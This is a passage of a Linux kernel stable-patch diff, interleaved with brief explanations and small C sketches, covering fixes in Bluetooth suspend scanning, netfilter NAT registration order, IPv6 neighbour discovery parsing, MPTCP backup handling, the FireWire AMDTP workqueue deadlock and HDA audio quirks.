+ 	filter_policy = hci_update_accept_list_sync(hdev);
+ 
++	/* If suspended and filter_policy set to 0x00 (no acceptlist) then
++	 * passive scanning cannot be started since that would require the host
++	 * to be woken up to process the reports.
++	 */
++	if (hdev->suspended && !filter_policy) {
++		/* Check if accept list is empty then there is no need to scan
++		 * while suspended.
++		 */
++		if (list_empty(&hdev->le_accept_list))
++			return 0;
++
++		/* If there are devices is the accept_list that means some
++		 * devices could not be programmed which in non-suspended case
++		 * means filter_policy needs to be set to 0x00 so the host needs
++		 * to filter, but since this is treating suspended case we
++		 * can ignore device needing host to filter to allow devices in
++		 * the acceptlist to be able to wakeup the system.
++		 */
++		filter_policy = 0x01;
++	}
++
+ 	/* When the controller is using random resolvable addresses and
+ 	 * with that having LE privacy enabled, then controllers with
+ 	 * Extended Scanner Filter Policies support can now enable support
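
The new hci_sync block encodes a three-way decision for suspended passive scanning: with an empty accept list there is nothing worth waking for, so scanning is skipped; otherwise the filter policy is forced to accept-list-only (0x01) so only programmed devices can wake the host. A compact sketch of that decision, with the inputs reduced to flags:

#include <stdio.h>

/* Sketch only: 0x00 (host filters) and 0x01 (accept list only) mirror
 * the HCI filter policy values used in the hunk above. */
static int pick_filter_policy(int suspended, int policy, int list_empty)
{
        if (suspended && policy == 0x00) {
                if (list_empty)
                        return -1;      /* nothing can wake us: skip scan */
                return 0x01;            /* only programmed devices wake */
        }
        return policy;
}

int main(void)
{
        printf("%d\n", pick_filter_policy(1, 0x00, 0)); /* 1 */
        printf("%d\n", pick_filter_policy(1, 0x00, 1)); /* -1 */
        return 0;
}
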
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 1163226c025c1..be663a7382ce9 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -3178,7 +3178,7 @@ static int rtnl_dellink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	if (ifm->ifi_index > 0)
+ 		dev = __dev_get_by_index(tgt_net, ifm->ifi_index);
+ 	else if (tb[IFLA_IFNAME] || tb[IFLA_ALT_IFNAME])
+-		dev = rtnl_dev_get(net, tb);
++		dev = rtnl_dev_get(tgt_net, tb);
+ 	else if (tb[IFLA_GROUP])
+ 		err = rtnl_group_dellink(tgt_net, nla_get_u32(tb[IFLA_GROUP]));
+ 	else
+diff --git a/net/ipv4/netfilter/iptable_nat.c b/net/ipv4/netfilter/iptable_nat.c
+index 56f6ecc43451e..12ca666d6e2c1 100644
+--- a/net/ipv4/netfilter/iptable_nat.c
++++ b/net/ipv4/netfilter/iptable_nat.c
+@@ -145,25 +145,27 @@ static struct pernet_operations iptable_nat_net_ops = {
+ 
+ static int __init iptable_nat_init(void)
+ {
+-	int ret = xt_register_template(&nf_nat_ipv4_table,
+-				       iptable_nat_table_init);
++	int ret;
+ 
++	/* net->gen->ptr[iptable_nat_net_id] must be allocated
++	 * before calling iptable_nat_table_init().
++	 */
++	ret = register_pernet_subsys(&iptable_nat_net_ops);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = register_pernet_subsys(&iptable_nat_net_ops);
+-	if (ret < 0) {
+-		xt_unregister_template(&nf_nat_ipv4_table);
+-		return ret;
+-	}
++	ret = xt_register_template(&nf_nat_ipv4_table,
++				   iptable_nat_table_init);
++	if (ret < 0)
++		unregister_pernet_subsys(&iptable_nat_net_ops);
+ 
+ 	return ret;
+ }
+ 
+ static void __exit iptable_nat_exit(void)
+ {
+-	unregister_pernet_subsys(&iptable_nat_net_ops);
+ 	xt_unregister_template(&nf_nat_ipv4_table);
++	unregister_pernet_subsys(&iptable_nat_net_ops);
+ }
+ 
+ module_init(iptable_nat_init);
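
The reordering matters because the template's init callback dereferences per-net storage, so the pernet subsystem must be registered first; the exit path then unwinds in exactly the reverse order. A sketch of the provider-before-consumer pattern, with registration reduced to prints:

#include <stdio.h>

/* Sketch only: the real calls are the pernet/xt registrations above. */
static int register_pernet(void)      { puts("pernet up");     return 0; }
static void unregister_pernet(void)   { puts("pernet down"); }
static int register_template(void)    { puts("template up");   return 0; }
static void unregister_template(void) { puts("template down"); }

static int nat_init(void)
{
        int ret = register_pernet();    /* per-net storage first */

        if (ret < 0)
                return ret;
        ret = register_template();      /* consumer second */
        if (ret < 0)
                unregister_pernet();    /* unwind on failure */
        return ret;
}

static void nat_exit(void)
{
        unregister_template();          /* strict reverse order */
        unregister_pernet();
}

int main(void)
{
        if (!nat_init())
                nat_exit();
        return 0;
}
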
+diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
+index 8c5a99fe68030..cfb4cf6e66549 100644
+--- a/net/ipv6/ndisc.c
++++ b/net/ipv6/ndisc.c
+@@ -227,6 +227,7 @@ struct ndisc_options *ndisc_parse_options(const struct net_device *dev,
+ 		return NULL;
+ 	memset(ndopts, 0, sizeof(*ndopts));
+ 	while (opt_len) {
++		bool unknown = false;
+ 		int l;
+ 		if (opt_len < sizeof(struct nd_opt_hdr))
+ 			return NULL;
+@@ -262,22 +263,23 @@ struct ndisc_options *ndisc_parse_options(const struct net_device *dev,
+ 			break;
+ #endif
+ 		default:
+-			if (ndisc_is_useropt(dev, nd_opt)) {
+-				ndopts->nd_useropts_end = nd_opt;
+-				if (!ndopts->nd_useropts)
+-					ndopts->nd_useropts = nd_opt;
+-			} else {
+-				/*
+-				 * Unknown options must be silently ignored,
+-				 * to accommodate future extension to the
+-				 * protocol.
+-				 */
+-				ND_PRINTK(2, notice,
+-					  "%s: ignored unsupported option; type=%d, len=%d\n",
+-					  __func__,
+-					  nd_opt->nd_opt_type,
+-					  nd_opt->nd_opt_len);
+-			}
++			unknown = true;
++		}
++		if (ndisc_is_useropt(dev, nd_opt)) {
++			ndopts->nd_useropts_end = nd_opt;
++			if (!ndopts->nd_useropts)
++				ndopts->nd_useropts = nd_opt;
++		} else if (unknown) {
++			/*
++			 * Unknown options must be silently ignored,
++			 * to accommodate future extension to the
++			 * protocol.
++			 */
++			ND_PRINTK(2, notice,
++				  "%s: ignored unsupported option; type=%d, len=%d\n",
++				  __func__,
++				  nd_opt->nd_opt_type,
++				  nd_opt->nd_opt_len);
+ 		}
+ next_opt:
+ 		opt_len -= l;
+diff --git a/net/ipv6/netfilter/ip6table_nat.c b/net/ipv6/netfilter/ip6table_nat.c
+index bf3cb3a13600c..52d597b16b658 100644
+--- a/net/ipv6/netfilter/ip6table_nat.c
++++ b/net/ipv6/netfilter/ip6table_nat.c
+@@ -147,23 +147,27 @@ static struct pernet_operations ip6table_nat_net_ops = {
+ 
+ static int __init ip6table_nat_init(void)
+ {
+-	int ret = xt_register_template(&nf_nat_ipv6_table,
+-				       ip6table_nat_table_init);
++	int ret;
+ 
++	/* net->gen->ptr[ip6table_nat_net_id] must be allocated
++	 * before calling ip6t_nat_register_lookups().
++	 */
++	ret = register_pernet_subsys(&ip6table_nat_net_ops);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = register_pernet_subsys(&ip6table_nat_net_ops);
++	ret = xt_register_template(&nf_nat_ipv6_table,
++				   ip6table_nat_table_init);
+ 	if (ret)
+-		xt_unregister_template(&nf_nat_ipv6_table);
++		unregister_pernet_subsys(&ip6table_nat_net_ops);
+ 
+ 	return ret;
+ }
+ 
+ static void __exit ip6table_nat_exit(void)
+ {
+-	unregister_pernet_subsys(&ip6table_nat_net_ops);
+ 	xt_unregister_template(&nf_nat_ipv6_table);
++	unregister_pernet_subsys(&ip6table_nat_net_ops);
+ }
+ 
+ module_init(ip6table_nat_init);
+diff --git a/net/iucv/af_iucv.c b/net/iucv/af_iucv.c
+index 498a0c35b7bb2..815b1df0b2d19 100644
+--- a/net/iucv/af_iucv.c
++++ b/net/iucv/af_iucv.c
+@@ -335,8 +335,8 @@ static void iucv_sever_path(struct sock *sk, int with_user_data)
+ 	struct iucv_sock *iucv = iucv_sk(sk);
+ 	struct iucv_path *path = iucv->path;
+ 
+-	if (iucv->path) {
+-		iucv->path = NULL;
++	/* Whoever resets the path pointer, must sever and free it. */
++	if (xchg(&iucv->path, NULL)) {
+ 		if (with_user_data) {
+ 			low_nmcpy(user_data, iucv->src_name);
+ 			high_nmcpy(user_data, iucv->dst_name);
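
The xchg() in iucv_sever_path() turns the path pointer into a single-owner token: whichever caller swaps it to NULL first is responsible for severing and freeing, and every later caller sees NULL and backs off. A sketch using C11 atomics in place of the kernel's xchg():

#include <stdatomic.h>
#include <stdio.h>
#include <stdlib.h>

/* Sketch only: atomic_exchange stands in for the kernel's xchg(). */
static _Atomic(int *) path;

static void sever_path(void)
{
        int *old = atomic_exchange(&path, NULL);

        if (old) {                      /* we won: sever and free */
                printf("freeing %d\n", *old);
                free(old);
        }                               /* losers see NULL: no-op */
}

int main(void)
{
        int *p = malloc(sizeof(*p));

        if (!p)
                return 1;
        *p = 42;
        atomic_store(&path, p);
        sever_path();
        sever_path();   /* second call harmlessly does nothing */
        return 0;
}
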
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index a718ebcb5bc63..daf53d685b5f3 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -904,7 +904,7 @@ bool mptcp_synack_options(const struct request_sock *req, unsigned int *size,
+ 		return true;
+ 	} else if (subflow_req->mp_join) {
+ 		opts->suboptions = OPTION_MPTCP_MPJ_SYNACK;
+-		opts->backup = subflow_req->backup;
++		opts->backup = subflow_req->request_bkup;
+ 		opts->join_id = subflow_req->local_id;
+ 		opts->thmac = subflow_req->thmac;
+ 		opts->nonce = subflow_req->local_nonce;
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 3e2cbf0e6ce99..e9dff63825817 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -481,7 +481,6 @@ static void __mptcp_pm_send_ack(struct mptcp_sock *msk, struct mptcp_subflow_con
+ 			msk->last_snd = NULL;
+ 
+ 		subflow->send_mp_prio = 1;
+-		subflow->backup = backup;
+ 		subflow->request_bkup = backup;
+ 	}
+ 
+@@ -1445,6 +1444,7 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	ret = remove_anno_list_by_saddr(msk, addr);
+ 	if (ret || force) {
+ 		spin_lock_bh(&msk->pm.lock);
++		msk->pm.add_addr_signaled -= ret;
+ 		mptcp_pm_remove_addr(msk, &list);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+@@ -1578,16 +1578,25 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ {
+ 	struct mptcp_rm_list alist = { .nr = 0 };
+ 	struct mptcp_pm_addr_entry *entry;
++	int anno_nr = 0;
+ 
+ 	list_for_each_entry(entry, rm_list, list) {
+-		if ((remove_anno_list_by_saddr(msk, &entry->addr) ||
+-		     lookup_subflow_by_saddr(&msk->conn_list, &entry->addr)) &&
+-		    alist.nr < MPTCP_RM_IDS_MAX)
+-			alist.ids[alist.nr++] = entry->addr.id;
++		if (alist.nr >= MPTCP_RM_IDS_MAX)
++			break;
++
++		/* only delete if either announced or matching a subflow */
++		if (remove_anno_list_by_saddr(msk, &entry->addr))
++			anno_nr++;
++		else if (!lookup_subflow_by_saddr(&msk->conn_list,
++						  &entry->addr))
++			continue;
++
++		alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
+ 	if (alist.nr) {
+ 		spin_lock_bh(&msk->pm.lock);
++		msk->pm.add_addr_signaled -= anno_nr;
+ 		mptcp_pm_remove_addr(msk, &alist);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+@@ -1600,17 +1609,18 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 	struct mptcp_pm_addr_entry *entry;
+ 
+ 	list_for_each_entry(entry, rm_list, list) {
+-		if (lookup_subflow_by_saddr(&msk->conn_list, &entry->addr) &&
+-		    slist.nr < MPTCP_RM_IDS_MAX)
++		if (slist.nr < MPTCP_RM_IDS_MAX &&
++		    lookup_subflow_by_saddr(&msk->conn_list, &entry->addr))
+ 			slist.ids[slist.nr++] = entry->addr.id;
+ 
+-		if (remove_anno_list_by_saddr(msk, &entry->addr) &&
+-		    alist.nr < MPTCP_RM_IDS_MAX)
++		if (alist.nr < MPTCP_RM_IDS_MAX &&
++		    remove_anno_list_by_saddr(msk, &entry->addr))
+ 			alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
+ 	if (alist.nr) {
+ 		spin_lock_bh(&msk->pm.lock);
++		msk->pm.add_addr_signaled -= alist.nr;
+ 		mptcp_pm_remove_addr(msk, &alist);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index d6f3e1b9e8442..75ae91c931294 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -363,8 +363,10 @@ static bool __mptcp_move_skb(struct mptcp_sock *msk, struct sock *ssk,
+ 	skb_orphan(skb);
+ 
+ 	/* try to fetch required memory from subflow */
+-	if (!mptcp_rmem_schedule(sk, ssk, skb->truesize))
++	if (!mptcp_rmem_schedule(sk, ssk, skb->truesize)) {
++		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_RCVPRUNED);
+ 		goto drop;
++	}
+ 
+ 	has_rxtstamp = TCP_SKB_CB(skb)->has_rxtstamp;
+ 
+@@ -851,10 +853,8 @@ void mptcp_data_ready(struct sock *sk, struct sock *ssk)
+ 		sk_rbuf = ssk_rbuf;
+ 
+ 	/* over limit? can't append more skbs to msk, Also, no need to wake-up*/
+-	if (__mptcp_rmem(sk) > sk_rbuf) {
+-		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_RCVPRUNED);
++	if (__mptcp_rmem(sk) > sk_rbuf)
+ 		return;
+-	}
+ 
+ 	/* Wake-up the reader only for in-sequence data */
+ 	mptcp_data_lock(sk);
+@@ -1491,13 +1491,15 @@ static struct sock *mptcp_subflow_get_send(struct mptcp_sock *msk)
+ 	}
+ 
+ 	mptcp_for_each_subflow(msk, subflow) {
++		bool backup = subflow->backup || subflow->request_bkup;
++
+ 		trace_mptcp_subflow_get_send(subflow);
+ 		ssk =  mptcp_subflow_tcp_sock(subflow);
+ 		if (!mptcp_subflow_active(subflow))
+ 			continue;
+ 
+ 		tout = max(tout, mptcp_timeout_from_subflow(subflow));
+-		nr_active += !subflow->backup;
++		nr_active += !backup;
+ 		pace = subflow->avg_pacing_rate;
+ 		if (unlikely(!pace)) {
+ 			/* init pacing rate from socket */
+@@ -1508,9 +1510,9 @@ static struct sock *mptcp_subflow_get_send(struct mptcp_sock *msk)
+ 		}
+ 
+ 		linger_time = div_u64((u64)READ_ONCE(ssk->sk_wmem_queued) << 32, pace);
+-		if (linger_time < send_info[subflow->backup].linger_time) {
+-			send_info[subflow->backup].ssk = ssk;
+-			send_info[subflow->backup].linger_time = linger_time;
++		if (linger_time < send_info[backup].linger_time) {
++			send_info[backup].ssk = ssk;
++			send_info[backup].linger_time = linger_time;
+ 		}
+ 	}
+ 	__mptcp_set_timeout(sk, tout);
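
The selection loop above keeps one best candidate per class (backup vs. non-backup), ranked by linger time, and only falls back to the backup bucket when no non-backup subflow is active; folding request_bkup into the class is what the fix changes. A sketch of that two-bucket choice, with subflows reduced to plain structs and the "active" checks dropped:

#include <stdint.h>
#include <stdio.h>

/* Sketch only: a subflow is reduced to its class and linger time. */
struct subflow {
        int backup;             /* backup || request_bkup in the fix */
        uint64_t linger_time;
};

static int pick_subflow(const struct subflow *sf, int n)
{
        uint64_t best[2] = { UINT64_MAX, UINT64_MAX };
        int pick[2] = { -1, -1 };
        int nr_active = 0;

        for (int i = 0; i < n; i++) {
                int b = sf[i].backup;

                nr_active += !b;
                if (sf[i].linger_time < best[b]) {
                        best[b] = sf[i].linger_time;
                        pick[b] = i;
                }
        }
        /* prefer the non-backup bucket whenever one exists */
        return nr_active ? pick[0] : pick[1];
}

int main(void)
{
        struct subflow sf[] = { {1, 5}, {0, 50}, {0, 20} };

        printf("%d\n", pick_subflow(sf, 3));    /* 2 */
        return 0;
}
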
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index eaed858c0ff94..a2b85eebb620b 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -400,6 +400,7 @@ struct mptcp_subflow_request_sock {
+ 	u16	mp_capable : 1,
+ 		mp_join : 1,
+ 		backup : 1,
++		request_bkup : 1,
+ 		csum_reqd : 1,
+ 		allow_join_id0 : 1;
+ 	u8	local_id;
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index f1d422396b28b..96bdd4119578f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1103,14 +1103,22 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	bool fin = TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN;
+-	u32 incr;
++	struct tcp_sock *tp = tcp_sk(ssk);
++	u32 offset, incr, avail_len;
+ 
+-	incr = limit >= skb->len ? skb->len + fin : limit;
++	offset = tp->copied_seq - TCP_SKB_CB(skb)->seq;
++	if (WARN_ON_ONCE(offset > skb->len))
++		goto out;
++
++	avail_len = skb->len - offset;
++	incr = limit >= avail_len ? avail_len + fin : limit;
+ 
+-	pr_debug("discarding=%d len=%d seq=%d", incr, skb->len,
+-		 subflow->map_subflow_seq);
++	pr_debug("discarding=%d len=%d offset=%d seq=%d", incr, skb->len,
++		 offset, subflow->map_subflow_seq);
+ 	MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_DUPDATA);
+ 	tcp_sk(ssk)->copied_seq += incr;
++
++out:
+ 	if (!before(tcp_sk(ssk)->copied_seq, TCP_SKB_CB(skb)->end_seq))
+ 		sk_eat_skb(ssk, skb);
+ 	if (mptcp_subflow_get_map_offset(subflow) >= subflow->map_data_len)
+@@ -1876,6 +1884,7 @@ static void subflow_ulp_clone(const struct request_sock *req,
+ 		new_ctx->mp_join = 1;
+ 		new_ctx->fully_established = 1;
+ 		new_ctx->backup = subflow_req->backup;
++		new_ctx->request_bkup = subflow_req->request_bkup;
+ 		WRITE_ONCE(new_ctx->remote_id, subflow_req->remote_id);
+ 		new_ctx->token = subflow_req->token;
+ 		new_ctx->thmac = subflow_req->thmac;
+diff --git a/net/netfilter/ipset/ip_set_list_set.c b/net/netfilter/ipset/ip_set_list_set.c
+index e839c356bcb56..902ff2f3bc72b 100644
+--- a/net/netfilter/ipset/ip_set_list_set.c
++++ b/net/netfilter/ipset/ip_set_list_set.c
+@@ -547,6 +547,9 @@ list_set_cancel_gc(struct ip_set *set)
+ 
+ 	if (SET_WITH_TIMEOUT(set))
+ 		del_timer_sync(&map->gc);
++
++	/* Flush list to drop references to other ipsets */
++	list_set_flush(set);
+ }
+ 
+ static const struct ip_set_type_variant set_variant = {
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index 44ff7f356ec15..9594dbc32165f 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -42,6 +42,8 @@ static DEFINE_MUTEX(zones_mutex);
+ struct zones_ht_key {
+ 	struct net *net;
+ 	u16 zone;
++	/* Note : pad[] must be the last field. */
++	u8  pad[];
+ };
+ 
+ struct tcf_ct_flow_table {
+@@ -58,7 +60,7 @@ struct tcf_ct_flow_table {
+ static const struct rhashtable_params zones_params = {
+ 	.head_offset = offsetof(struct tcf_ct_flow_table, node),
+ 	.key_offset = offsetof(struct tcf_ct_flow_table, key),
+-	.key_len = sizeof_field(struct tcf_ct_flow_table, key),
++	.key_len = offsetof(struct zones_ht_key, pad),
+ 	.automatic_shrinking = true,
+ };
+ 
+diff --git a/net/sysctl_net.c b/net/sysctl_net.c
+index 4b45ed631eb8b..2edb8040eb6c7 100644
+--- a/net/sysctl_net.c
++++ b/net/sysctl_net.c
+@@ -54,7 +54,6 @@ static int net_ctl_permissions(struct ctl_table_header *head,
+ }
+ 
+ static void net_ctl_set_ownership(struct ctl_table_header *head,
+-				  struct ctl_table *table,
+ 				  kuid_t *uid, kgid_t *gid)
+ {
+ 	struct net *net = container_of(head->set, struct net, sysctls);
+diff --git a/sound/firewire/amdtp-stream.c b/sound/firewire/amdtp-stream.c
+index 8753125683692..842fe127c5378 100644
+--- a/sound/firewire/amdtp-stream.c
++++ b/sound/firewire/amdtp-stream.c
+@@ -77,6 +77,8 @@
+ // overrun. Actual device can skip more, then this module stops the packet streaming.
+ #define IR_JUMBO_PAYLOAD_MAX_SKIP_CYCLES	5
+ 
++static void pcm_period_work(struct work_struct *work);
++
+ /**
+  * amdtp_stream_init - initialize an AMDTP stream structure
+  * @s: the AMDTP stream to initialize
+@@ -105,6 +107,7 @@ int amdtp_stream_init(struct amdtp_stream *s, struct fw_unit *unit,
+ 	s->flags = flags;
+ 	s->context = ERR_PTR(-1);
+ 	mutex_init(&s->mutex);
++	INIT_WORK(&s->period_work, pcm_period_work);
+ 	s->packet_index = 0;
+ 
+ 	init_waitqueue_head(&s->ready_wait);
+@@ -343,6 +346,7 @@ EXPORT_SYMBOL(amdtp_stream_get_max_payload);
+  */
+ void amdtp_stream_pcm_prepare(struct amdtp_stream *s)
+ {
++	cancel_work_sync(&s->period_work);
+ 	s->pcm_buffer_pointer = 0;
+ 	s->pcm_period_pointer = 0;
+ }
+@@ -609,19 +613,21 @@ static void update_pcm_pointers(struct amdtp_stream *s,
+ 		// The program in user process should periodically check the status of intermediate
+ 		// buffer associated to PCM substream to process PCM frames in the buffer, instead
+ 		// of receiving notification of period elapsed by poll wait.
+-		if (!pcm->runtime->no_period_wakeup) {
+-			if (in_softirq()) {
+-				// In software IRQ context for 1394 OHCI.
+-				snd_pcm_period_elapsed(pcm);
+-			} else {
+-				// In process context of ALSA PCM application under acquired lock of
+-				// PCM substream.
+-				snd_pcm_period_elapsed_under_stream_lock(pcm);
+-			}
+-		}
++		if (!pcm->runtime->no_period_wakeup)
++			queue_work(system_highpri_wq, &s->period_work);
+ 	}
+ }
+ 
++static void pcm_period_work(struct work_struct *work)
++{
++	struct amdtp_stream *s = container_of(work, struct amdtp_stream,
++					      period_work);
++	struct snd_pcm_substream *pcm = READ_ONCE(s->pcm);
++
++	if (pcm)
++		snd_pcm_period_elapsed(pcm);
++}
++
+ static int queue_packet(struct amdtp_stream *s, struct fw_iso_packet *params,
+ 			bool sched_irq)
+ {
+@@ -1738,11 +1744,14 @@ unsigned long amdtp_domain_stream_pcm_pointer(struct amdtp_domain *d,
+ {
+ 	struct amdtp_stream *irq_target = d->irq_target;
+ 
+-	// Process isochronous packets queued till recent isochronous cycle to handle PCM frames.
+ 	if (irq_target && amdtp_stream_running(irq_target)) {
+-		// In software IRQ context, the call causes dead-lock to disable the tasklet
+-		// synchronously.
+-		if (!in_softirq())
++		// use wq to prevent AB/BA deadlock competition for
++		// substream lock:
++		// fw_iso_context_flush_completions() acquires
++		// lock by ohci_flush_iso_completions(),
++		// amdtp-stream process_rx_packets() attempts to
++		// acquire same lock by snd_pcm_elapsed()
++		if (current_work() != &s->period_work)
+ 			fw_iso_context_flush_completions(irq_target->context);
+ 	}
+ 
+@@ -1798,6 +1807,7 @@ static void amdtp_stream_stop(struct amdtp_stream *s)
+ 		return;
+ 	}
+ 
++	cancel_work_sync(&s->period_work);
+ 	fw_iso_context_stop(s->context);
+ 	fw_iso_context_destroy(s->context);
+ 	s->context = ERR_PTR(-1);
+diff --git a/sound/firewire/amdtp-stream.h b/sound/firewire/amdtp-stream.h
+index cf9ab347277f2..011d0f0c39415 100644
+--- a/sound/firewire/amdtp-stream.h
++++ b/sound/firewire/amdtp-stream.h
+@@ -190,6 +190,7 @@ struct amdtp_stream {
+ 
+ 	/* For a PCM substream processing. */
+ 	struct snd_pcm_substream *pcm;
++	struct work_struct period_work;
+ 	snd_pcm_uframes_t pcm_buffer_pointer;
+ 	unsigned int pcm_period_pointer;
+ 
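
The amdtp rework moves snd_pcm_period_elapsed() out of the packet-completion path into a work item, so the completion side only queues work and never contends for the substream lock that the flush path may already hold. A single-threaded model of the deferral, with the workqueue reduced to a one-slot pending flag:

#include <stdio.h>

/* Sketch only: the workqueue is a flag and locking is omitted. */
struct stream {
        int period_work_pending;
};

static void period_callback(void)
{
        puts("period elapsed");         /* snd_pcm_period_elapsed() spot */
}

static void completion_path(struct stream *s)
{
        s->period_work_pending = 1;     /* queue_work() analogue: cheap,
                                           takes no substream lock */
}

static void worker(struct stream *s)
{
        if (s->period_work_pending) {
                s->period_work_pending = 0;
                period_callback();      /* runs outside the irq path */
        }
}

int main(void)
{
        struct stream s = { 0 };

        completion_path(&s);
        worker(&s);
        return 0;
}
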
+diff --git a/sound/pci/hda/hda_controller.h b/sound/pci/hda/hda_controller.h
+index 8556031bcd68e..f31cb31d46362 100644
+--- a/sound/pci/hda/hda_controller.h
++++ b/sound/pci/hda/hda_controller.h
+@@ -28,7 +28,7 @@
+ #else
+ #define AZX_DCAPS_I915_COMPONENT 0		/* NOP */
+ #endif
+-/* 14 unused */
++#define AZX_DCAPS_AMD_ALLOC_FIX	(1 << 14)	/* AMD allocation workaround */
+ #define AZX_DCAPS_CTX_WORKAROUND (1 << 15)	/* X-Fi workaround */
+ #define AZX_DCAPS_POSFIX_LPIB	(1 << 16)	/* Use LPIB as default */
+ #define AZX_DCAPS_AMD_WORKAROUND (1 << 17)	/* AMD-specific workaround */
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index a26f2a2d44cf2..695026c647e1e 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -40,6 +40,7 @@
+ 
+ #ifdef CONFIG_X86
+ /* for snoop control */
++#include <linux/dma-map-ops.h>
+ #include <asm/set_memory.h>
+ #include <asm/cpufeature.h>
+ #endif
+@@ -300,7 +301,7 @@ enum {
+ 
+ /* quirks for ATI HDMI with snoop off */
+ #define AZX_DCAPS_PRESET_ATI_HDMI_NS \
+-	(AZX_DCAPS_PRESET_ATI_HDMI | AZX_DCAPS_SNOOP_OFF)
++	(AZX_DCAPS_PRESET_ATI_HDMI | AZX_DCAPS_AMD_ALLOC_FIX)
+ 
+ /* quirks for AMD SB */
+ #define AZX_DCAPS_PRESET_AMD_SB \
+@@ -1718,6 +1719,13 @@ static void azx_check_snoop_available(struct azx *chip)
+ 	if (chip->driver_caps & AZX_DCAPS_SNOOP_OFF)
+ 		snoop = false;
+ 
++#ifdef CONFIG_X86
++	/* check the presence of DMA ops (i.e. IOMMU), disable snoop conditionally */
++	if ((chip->driver_caps & AZX_DCAPS_AMD_ALLOC_FIX) &&
++	    !get_dma_ops(chip->card->dev))
++		snoop = false;
++#endif
++
+ 	chip->snoop = snoop;
+ 	if (!snoop) {
+ 		dev_info(chip->card->dev, "Force to non-snoop mode\n");
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index e8209178d87bb..af921364195e4 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -21,12 +21,6 @@
+ #include "hda_jack.h"
+ #include "hda_generic.h"
+ 
+-enum {
+-	CX_HEADSET_NOPRESENT = 0,
+-	CX_HEADSET_PARTPRESENT,
+-	CX_HEADSET_ALLPRESENT,
+-};
+-
+ struct conexant_spec {
+ 	struct hda_gen_spec gen;
+ 
+@@ -48,7 +42,6 @@ struct conexant_spec {
+ 	unsigned int gpio_led;
+ 	unsigned int gpio_mute_led_mask;
+ 	unsigned int gpio_mic_led_mask;
+-	unsigned int headset_present_flag;
+ 	bool is_cx8070_sn6140;
+ };
+ 
+@@ -250,48 +243,19 @@ static void cx_process_headset_plugin(struct hda_codec *codec)
+ 	}
+ }
+ 
+-static void cx_update_headset_mic_vref(struct hda_codec *codec, unsigned int res)
++static void cx_update_headset_mic_vref(struct hda_codec *codec, struct hda_jack_callback *event)
+ {
+-	unsigned int phone_present, mic_persent, phone_tag, mic_tag;
+-	struct conexant_spec *spec = codec->spec;
++	unsigned int mic_present;
+ 
+ 	/* In cx8070 and sn6140, the node 16 can only be config to headphone or disabled,
+ 	 * the node 19 can only be config to microphone or disabled.
+ 	 * Check hp&mic tag to process headset pulgin&plugout.
+ 	 */
+-	phone_tag = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
+-	mic_tag = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
+-	if ((phone_tag & (res >> AC_UNSOL_RES_TAG_SHIFT)) ||
+-	    (mic_tag & (res >> AC_UNSOL_RES_TAG_SHIFT))) {
+-		phone_present = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_PIN_SENSE, 0x0);
+-		if (!(phone_present & AC_PINSENSE_PRESENCE)) {/* headphone plugout */
+-			spec->headset_present_flag = CX_HEADSET_NOPRESENT;
+-			snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
+-			return;
+-		}
+-		if (spec->headset_present_flag == CX_HEADSET_NOPRESENT) {
+-			spec->headset_present_flag = CX_HEADSET_PARTPRESENT;
+-		} else if (spec->headset_present_flag == CX_HEADSET_PARTPRESENT) {
+-			mic_persent = snd_hda_codec_read(codec, 0x19, 0,
+-							 AC_VERB_GET_PIN_SENSE, 0x0);
+-			/* headset is present */
+-			if ((phone_present & AC_PINSENSE_PRESENCE) &&
+-			    (mic_persent & AC_PINSENSE_PRESENCE)) {
+-				cx_process_headset_plugin(codec);
+-				spec->headset_present_flag = CX_HEADSET_ALLPRESENT;
+-			}
+-		}
+-	}
+-}
+-
